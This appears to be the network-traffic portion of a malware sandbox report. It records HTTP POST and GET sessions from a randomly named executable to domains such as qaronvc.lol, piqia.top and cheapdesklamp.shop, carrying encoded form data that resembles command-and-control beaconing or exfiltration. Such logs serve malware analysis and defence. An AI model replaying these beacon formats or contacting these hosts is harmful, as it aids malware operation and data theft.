                7192.168.2.460626116.213.43.190802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:36:29.185380936 CEST10858OUTPOST /d8kh/ HTTP/1.1
                Host: www.qaronvc.lol
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.qaronvc.lol
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.qaronvc.lol/d8kh/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 4f 68 56 4d 37 61 73 68 58 31 50 62 70 31 33 78 77 48 4a 67 46 31 34 4a 78 70 43 46 53 50 34 4f 51 39 33 6b 77 6e 48 76 72 4b 58 32 50 44 55 41 32 47 48 45 62 45 67 2f 78 73 48 33 74 61 34 4d 72 4e 72 2f 74 30 34 69 4c 6a 79 41 32 51 33 31 42 6c 42 33 4f 6a 75 56 35 74 54 30 2f 78 76 6c 5a 65 66 66 4b 57 62 6f 33 52 31 72 55 4c 45 77 4b 75 6c 6b 6b 2f 66 42 4c 38 78 63 47 51 2f 33 51 78 63 67 4e 64 32 78 6b 4f 66 52 66 33 34 79 2b 34 61 30 2f 33 2f 4f 4f 71 4d 45 61 49 78 54 78 36 74 48 67 6d 6e 69 2f 33 4c 75 31 31 62 65 75 75 47 65 61 51 52 71 54 58 4f 49 7a 59 57 4d 44 63 38 6b 53 31 71 6a 76 67 4c 49 78 43 74 44 48 51 58 4e 52 4e 75 4a 49 57 33 76 6a 58 4c 6d 63 4f 52 35 52 30 6f 4c 45 75 55 4c 75 77 69 72 77 63 42 66 4e 4f 69 77 74 64 7a 4b 76 44 42 46 52 74 6a 55 72 66 47 41 44 33 6b 33 74 4f 46 54 77 72 61 65 6c 4a 57 36 71 31 74 62 31 78 46 58 56 5a 62 6c 66 62 42 58 31 70 56 66 57 45 67 58 37 48 6f 44 31 44 48 52 44 33 58 78 4e 64 70 43 5a 62 61 54 67 71 57 70 4a 69 30 [TRUNCATED]
                Data Ascii: LtQxGF=OhVM7ashX1Pbp13xwHJgF14JxpCFSP4OQ93kwnHvrKX2PDUA2GHEbEg/xsH3ta4MrNr/t04iLjyA2Q31BlB3OjuV5tT0/xvlZeffKWbo3R1rULEwKulkk/fBL8xcGQ/3QxcgNd2xkOfRf34y+4a0/3/OOqMEaIxTx6tHgmni/3Lu11beuuGeaQRqTXOIzYWMDc8kS1qjvgLIxCtDHQXNRNuJIW3vjXLmcOR5R0oLEuULuwirwcBfNOiwtdzKvDBFRtjUrfGAD3k3tOFTwraelJW6q1tb1xFXVZblfbBX1pVfWEgX7HoD1DHRD3XxNdpCZbaTgqWpJi0oCTpHMD06chKvbnG8vwMFxJzv24ebBx8XDPjnl7HmpnVCZQChhLp/QPTF4q3HHUdllo96X5a6APW2+wxJbP8qQfjED4bU4HjJWLaOMoHnO5pv+kKjQ3UgEdQXsqqeACvzL5jAO+m/qpX6Qj5QEifF8SE1yRluxlsJyJl+51mNF7NMO9KcdaSHKRjil3XYS9d5yhP8NYmayzayNnNGZRSyBCiCd68hnqvZROk3jwUXX0RzROmogZQX8ea+6dz5DBDWLgN7Jh1zM2cktV6wGtsoTQIrObIantyLEyTyXxQhZTtqgT678A13a4EbZdEiHt3RoZGE+He4k6gHKFOORpAqG4kjpmZmD/yGJ8pur61B8P4MzJsRLVWt36grNvd0N8gAkD87nvOfy/Gru4y6rWFAbtaNsLEdfjYP4/MCepr4I5MvPsSo7F8h92BLhLJzxbbal/4TK7GZ2zWjJFq6R2Or1/2IAgSoPQeykoFcP0Wop7L60Zvv3nQdVscTdSuSQpEVc2Sp1nqYeRbJq5Dd4lknp17ECWrxm0YFIJTnw6AQqmO8pyDCPZYnEu7YyJG1iz0tBvngsicr/k3E/fSMVqH22f/YSjyfQUm7F7Cg36lZtK2tNBRLOfGQfPWcG4MLbw9QH1h1IuFq3LQHgj5Ol9UNiOsSZhlj2d+W9 [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.460627116.213.43.190802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:36:31.720571995 CEST488OUTGET /d8kh/?LtQxGF=Dj9s4sQnIR+vsDnKwlk6Nlhqw7itdOFaW/ig+XnRtKCOHSdW0TDTG1cm2v2szq88ld3O918FFXWQyjmpenJ9MCf4z9ns+SbMecfFG1uyoV1oJcUCPfEdpdE=&tDVH=AxaL HTTP/1.1
                Host: www.qaronvc.lol
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.460628172.80.82.186802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:36:59.253226042 CEST750OUTPOST /rlze/ HTTP/1.1
                Host: www.piqia.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.piqia.top
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.piqia.top/rlze/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 58 4b 61 67 66 6d 52 39 44 34 49 54 31 6a 4e 53 59 75 51 51 31 46 4b 65 31 2f 52 4a 55 6d 68 49 34 74 64 30 69 72 63 79 30 7a 73 46 48 46 78 4b 44 64 46 45 6b 2f 6f 35 52 65 64 73 50 58 30 6a 75 30 4e 7a 62 35 6b 5a 64 33 4f 4e 42 69 38 65 50 6c 4f 7a 42 4f 77 4a 4a 4c 73 62 36 52 6d 6e 44 52 55 4c 2f 37 6f 64 42 66 75 6f 46 4c 67 2f 35 6c 36 5a 58 56 7a 4f 4b 44 4c 67 35 67 38 71 77 6f 6b 76 2b 5a 45 43 37 65 77 58 4a 48 36 69 4b 59 59 75 36 46 6c 50 48 37 41 63 32 76 30 53 74 50 32 71 6d 77 7a 62 53 48 74 62 66 79 47 56 6f 64 30 4a 35 31 44 46 4e 38 6f 61 5a 30 59 74 4a 77 3d 3d
                Data Ascii: LtQxGF=XKagfmR9D4IT1jNSYuQQ1FKe1/RJUmhI4td0ircy0zsFHFxKDdFEk/o5RedsPX0ju0Nzb5kZd3ONBi8ePlOzBOwJJLsb6RmnDRUL/7odBfuoFLg/5l6ZXVzOKDLg5g8qwokv+ZEC7ewXJH6iKYYu6FlPH7Ac2v0StP2qmwzbSHtbfyGVod0J51DFN8oaZ0YtJw==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.460629172.80.82.186802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:01.781228065 CEST770OUTPOST /rlze/ HTTP/1.1
                Host: www.piqia.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.piqia.top
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.piqia.top/rlze/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 58 4b 61 67 66 6d 52 39 44 34 49 54 6b 7a 64 53 61 50 51 51 30 6c 4b 5a 32 2f 52 4a 64 47 68 4d 34 74 68 30 69 75 6b 63 31 47 45 46 45 67 4e 4b 52 66 74 45 71 66 6f 35 65 2b 63 6d 43 33 31 68 75 30 42 4e 62 34 59 5a 64 7a 65 4e 42 6a 4d 65 49 53 69 77 4f 2b 77 4c 63 62 73 56 33 78 6d 6e 44 52 55 4c 2f 37 38 37 42 66 6d 6f 46 37 51 2f 37 45 37 50 4c 46 7a 4e 63 54 4c 67 7a 41 38 75 77 6f 6b 5a 2b 62 67 6b 37 64 49 58 4a 43 65 69 4b 4a 59 74 30 31 6c 7a 4a 62 42 43 31 2b 6c 4c 6f 50 76 2b 70 67 33 62 66 47 68 70 54 55 58 50 35 73 56 65 72 31 6e 32 51 37 68 75 55 33 6c 6b 53 30 70 4b 70 52 4a 49 56 37 63 44 5a 67 66 2b 36 7a 44 46 45 31 77 3d
                Data Ascii: LtQxGF=XKagfmR9D4ITkzdSaPQQ0lKZ2/RJdGhM4th0iukc1GEFEgNKRftEqfo5e+cmC31hu0BNb4YZdzeNBjMeISiwO+wLcbsV3xmnDRUL/787BfmoF7Q/7E7PLFzNcTLgzA8uwokZ+bgk7dIXJCeiKJYt01lzJbBC1+lLoPv+pg3bfGhpTUXP5sVer1n2Q7huU3lkS0pKpRJIV7cDZgf+6zDFE1w=
                Jul 4, 2024 12:37:03.692998886 CEST1236INHTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
                Date: Thu, 04 Jul 2024 10:37:07 GMT
                Connection: close
                Content-Length: 1611
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found - www.piqia.top</title><style>body {font-size:14px;color:#000;margin:0;padding:0;font-family: "Microsoft Yahei", , Tahoma, "Helvetica Neue,Hiragino Sans GB,Segoe UI", Arial, STHeiti, sans-serif;}.top{background-color:#3366cc;height:30px;line-height:30px;color:#FFF;}A.l:link {color: #6f6f6f}A.u:link {color: green}h1{font-size:22px;}ul{margin:1em;}#menuzafd7c{line-height:26px; border-bottom:1px solid #009;background:#efefef; padding-left:10px;}#menuzafd7c a,#server a{text-decoration:none}.olzafd7c li{line-height:30px;}a{color:#00f;}.copyright{position:absolute;;left:0;top:-500px;}</style></head><body><div class="top"><b>www.piqia.top 404 Error</b></div><div id="menuzafd7c"><a href="//www.piqia.top"> [TRUNCATED]
                Jul 4, 2024 12:37:03.693017006 CEST570INData Raw: 74 3a 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 22 3e e8 bf 94 e5 9b 9e e4 b8 8a e4 b8 80 e9 a1 b5 3c 2f 61 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 3c 48 31 3e e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e6 b2 a1 e6
                Data Ascii: t:history.go(-1);"></a></div><blockquote><H1></H1><ol> <ul type="square" class="olzafd7c"> <li></li> <li>
                Jul 4, 2024 12:37:03.693186998 CEST1236INHTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
                Date: Thu, 04 Jul 2024 10:37:07 GMT
                Connection: close
                Content-Length: 1611
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found - www.piqia.top</title><style>body {font-size:14px;color:#000;margin:0;padding:0;font-family: "Microsoft Yahei", , Tahoma, "Helvetica Neue,Hiragino Sans GB,Segoe UI", Arial, STHeiti, sans-serif;}.top{background-color:#3366cc;height:30px;line-height:30px;color:#FFF;}A.l:link {color: #6f6f6f}A.u:link {color: green}h1{font-size:22px;}ul{margin:1em;}#menuzafd7c{line-height:26px; border-bottom:1px solid #009;background:#efefef; padding-left:10px;}#menuzafd7c a,#server a{text-decoration:none}.olzafd7c li{line-height:30px;}a{color:#00f;}.copyright{position:absolute;;left:0;top:-500px;}</style></head><body><div class="top"><b>www.piqia.top 404 Error</b></div><div id="menuzafd7c"><a href="//www.piqia.top"> [TRUNCATED]
                Jul 4, 2024 12:37:03.694255114 CEST1236INHTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
                Date: Thu, 04 Jul 2024 10:37:07 GMT
                Connection: close
                Content-Length: 1611
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found - www.piqia.top</title><style>body {font-size:14px;color:#000;margin:0;padding:0;font-family: "Microsoft Yahei", , Tahoma, "Helvetica Neue,Hiragino Sans GB,Segoe UI", Arial, STHeiti, sans-serif;}.top{background-color:#3366cc;height:30px;line-height:30px;color:#FFF;}A.l:link {color: #6f6f6f}A.u:link {color: green}h1{font-size:22px;}ul{margin:1em;}#menuzafd7c{line-height:26px; border-bottom:1px solid #009;background:#efefef; padding-left:10px;}#menuzafd7c a,#server a{text-decoration:none}.olzafd7c li{line-height:30px;}a{color:#00f;}.copyright{position:absolute;;left:0;top:-500px;}</style></head><body><div class="top"><b>www.piqia.top 404 Error</b></div><div id="menuzafd7c"><a href="//www.piqia.top"> [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.460630172.80.82.186802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:04.649194002 CEST10852OUTPOST /rlze/ HTTP/1.1
                Host: www.piqia.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.piqia.top
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.piqia.top/rlze/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 58 4b 61 67 66 6d 52 39 44 34 49 54 6b 7a 64 53 61 50 51 51 30 6c 4b 5a 32 2f 52 4a 64 47 68 4d 34 74 68 30 69 75 6b 63 31 47 63 46 45 53 31 4b 44 2b 74 45 70 66 6f 35 54 65 63 6c 43 33 30 35 75 30 5a 42 62 34 55 7a 64 31 43 4e 42 41 55 65 4a 6d 32 77 56 75 77 4c 44 72 73 55 36 52 6d 75 44 52 45 31 2f 34 45 37 42 66 6d 6f 46 34 49 2f 79 31 37 50 59 31 7a 4f 4b 44 4c 73 35 67 39 35 77 6f 73 4a 2b 62 6b 53 37 73 6f 58 4a 69 75 69 49 2f 6b 74 32 56 6c 4c 4b 62 42 4b 31 2b 70 75 6f 50 7a 79 70 6a 71 38 66 47 6c 70 54 56 32 73 70 39 4d 42 38 7a 76 53 4c 4c 78 56 64 46 42 65 57 32 5a 41 68 43 56 6f 46 76 6f 74 52 48 71 7a 6d 79 48 59 61 68 65 56 51 74 6d 64 62 6e 36 4e 4d 47 41 6a 57 38 42 4f 70 6c 62 4a 76 6a 43 44 64 45 4a 39 2f 47 6b 69 4a 57 5a 46 4c 71 79 63 45 31 37 56 2f 63 33 64 6e 62 2f 42 38 41 65 6f 38 64 75 55 69 49 6e 6a 67 43 57 42 61 53 59 4b 79 6d 46 6f 34 75 73 5a 68 39 78 6f 56 61 78 70 4d 62 78 4e 4b 75 42 74 58 68 68 4e 31 43 64 6f 54 49 70 45 33 70 56 46 45 66 55 [TRUNCATED]
                Data Ascii: LtQxGF=XKagfmR9D4ITkzdSaPQQ0lKZ2/RJdGhM4th0iukc1GcFES1KD+tEpfo5TeclC305u0ZBb4Uzd1CNBAUeJm2wVuwLDrsU6RmuDRE1/4E7BfmoF4I/y17PY1zOKDLs5g95wosJ+bkS7soXJiuiI/kt2VlLKbBK1+puoPzypjq8fGlpTV2sp9MB8zvSLLxVdFBeW2ZAhCVoFvotRHqzmyHYaheVQtmdbn6NMGAjW8BOplbJvjCDdEJ9/GkiJWZFLqycE17V/c3dnb/B8Aeo8duUiInjgCWBaSYKymFo4usZh9xoVaxpMbxNKuBtXhhN1CdoTIpE3pVFEfUzbzG5+liXh71lVgQtA7A4sMYQ1VV6FDsxkfJ1TYxfXBDGmZajjrj8dgqEFvFnT4QNzqN7ykUf5ULQlRinVoHb5jZ3NHynmWFXu3A8teD2y5GrG8BvCme1eHwECCsblcgYfskQBNHaiZ6hSg3fgloslRt+Kfea56FPD6WqGa0ODjV8nF4ArX6pFj4w2rXLTqdskX1KlwFaAD1l/1K59RfBDu3T3N2IpnrigGy5hXGOfO8lwQyFHmBjPvbTh8Jo0eT76gnGHqwEZq/4nNQwhrynD8xy18bn1xA9mKudQ8OijLaFWUAw5RfiB9z132GQXEbhqvHDHZQbfA9d3uW9+em5iIZtVor+lEmb/SOkljR/LBeL6kx2qL43ads6AkUpodbkruGC3kV3rHoqz0I6q/cNhdb+Wny/twS4Q7HifsNPQjgPZTYX5vj7M33q3oX4xbRUS7ZFtV7gqU4KjkpB9w/UunaLmZ5ZeY27JuNYNS+Q/z9Uc05ftKEMWGMInq2TwHNz6HwnPa9R5HJFO92j50Epf4b2RvoFHpZYD9cn5OYTz5GDgCsqjTKku+Blw9NszIN7zqFXcFQdNlsExf7AKEKbAEiOg/UkzvAT3xii2wb0AMdi2LRsA5Z74q6bHretjR4ZpW+httP3E3alYesO+pETGHWqPOUlWD9KY [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.460631172.80.82.186802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:07.168397903 CEST486OUTGET /rlze/?LtQxGF=aIyAcRArRtIGvQhfdflYxlfrxIZLeHRFwP1NsuYwxTNgARVeV6obq7xFZv4/a30th0BoYK05fy/0IwAkOE+OBI8+L6UIixinPDwn66JMG/Wbc84G9m2CbnU=&tDVH=AxaL HTTP/1.1
                Host: www.piqia.top
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Jul 4, 2024 12:37:07.874010086 CEST1236INHTTP/1.1 404 Not Found
                Content-Type: text/html;charset=UTF-8
                Server: Microsoft-IIS/7.5
                X-Powered-By: PHP/7.4.6
                Date: Thu, 04 Jul 2024 10:37:12 GMT
                Connection: close
                Content-Length: 1611
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found - www.piqia.top</title><style>body {font-size:14px;color:#000;margin:0;padding:0;font-family: "Microsoft Yahei", , Tahoma, "Helvetica Neue,Hiragino Sans GB,Segoe UI", Arial, STHeiti, sans-serif;}.top{background-color:#3366cc;height:30px;line-height:30px;color:#FFF;}A.l:link {color: #6f6f6f}A.u:link {color: green}h1{font-size:22px;}ul{margin:1em;}#menuzafd7c{line-height:26px; border-bottom:1px solid #009;background:#efefef; padding-left:10px;}#menuzafd7c a,#server a{text-decoration:none}.olzafd7c li{line-height:30px;}a{color:#00f;}.copyright{position:absolute;;left:0;top:-500px;}</style></head><body><div class="top"><b>www.piqia.top 404 Error</b></div><div id="menuzafd7c"><a href="//www.piqia.top"> [TRUNCATED]
                Jul 4, 2024 12:37:07.874424934 CEST570INData Raw: 74 3a 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 3b 22 3e e8 bf 94 e5 9b 9e e4 b8 8a e4 b8 80 e9 a1 b5 3c 2f 61 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 3c 48 31 3e e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e6 b2 a1 e6
                Data Ascii: t:history.go(-1);"></a></div><blockquote><H1></H1><ol> <ul type="square" class="olzafd7c"> <li></li> <li>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.460632194.195.220.41802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:37:13.031455994 CEST777OUTPOST /9nq7/ HTTP/1.1
                Host: www.cheapdesklamp.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.cheapdesklamp.shop
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.cheapdesklamp.shop/9nq7/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
